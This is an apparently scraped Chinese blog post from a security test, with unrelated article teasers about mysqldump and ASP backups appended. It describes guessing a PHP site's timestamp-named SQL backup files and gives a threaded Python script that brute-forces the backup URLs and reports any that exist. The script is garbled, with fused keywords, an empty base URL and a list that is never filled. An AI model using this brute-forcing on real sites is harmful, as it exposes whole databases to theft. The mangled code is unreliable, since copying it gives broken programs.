某次測試過程中,發現php備份功能**如下:
//那麼形成的檔名格式如:d20180118t101433.sql,理論上是可以爆破的,於是寫了一段python指令碼來嘗試爆破。根據時間生成備份檔案名
$file_name = 'd' . date('ymd') . 't' . date('his');
$sql_file_name = $file_name . '.sql';
python測試指令碼:
簡單描述:設定乙個開始的時間戳,然後遍歷時間戳到當前時間點,得到乙個列表,儲存的時間格式為「20180110 000637」,然後帶入請求,進行暴力猜解url是否存在,如果存在就輸出。
#python 測試截圖:! /usr/bin/env python
#_*_ coding:utf-8 _*_
import
time
import
requests
import
threadpool
date= "
2018-01-18 10:00:00
" //開始時間
datelist=
defgettime():
timearray = time.strptime(date,"
%y-%m-%d %h:%m:%s")
time1=int(time.mktime(timearray))
time2=int(time.time())
for i in
range(time1,time2):
time3= time.strftime('
%y%m%d %h%m%s
', time.localtime(i))
return
datelist
defreq(str):
try:
str1,str2=str.split()
date1="
d"+str1+"
t"+str2
url="
"+date1+"
.sql
"s=requests.get(url,timeout=5)
if s.status_code==200:
print u"
資料庫備份檔案爆破成功:
url
except
:
pass
if__name__ == '
__main__':
list=gettime()
pool = threadpool.threadpool(1000)
requ =threadpool.makerequests(req,list)
[pool.putrequest(req)
for req in
requ]
pool.wait()
python時間,日期,時間戳處理
利用mysqldump備份資料庫
mysqldump是sql級別的備份機制,它將資料表導成sql指令碼檔案,是非常常用的備份方法。下面整理了mysqldump的用法和幾個常用引數。基本用法 mysqldump u使用者名稱 p密碼 h主機 資料庫 表 檔名如果想匯出整個庫,不加表名即可。例 mysqldump uroot h10.1...
利用ASP備份SQL SERVER資料庫
if session user name then response.write end if call connlink name session user name set rs1 server.createobject adodb.recordset sql1 select from user...
利用mysqldump備份資料庫
在 執行 中輸入cmd進入命令列,然後進入mysql的bin目錄下,執行 mysqldump h localhost uusername ppassword databasename filename 例如 mysqldump h localhost uroot proot mydb d mydb....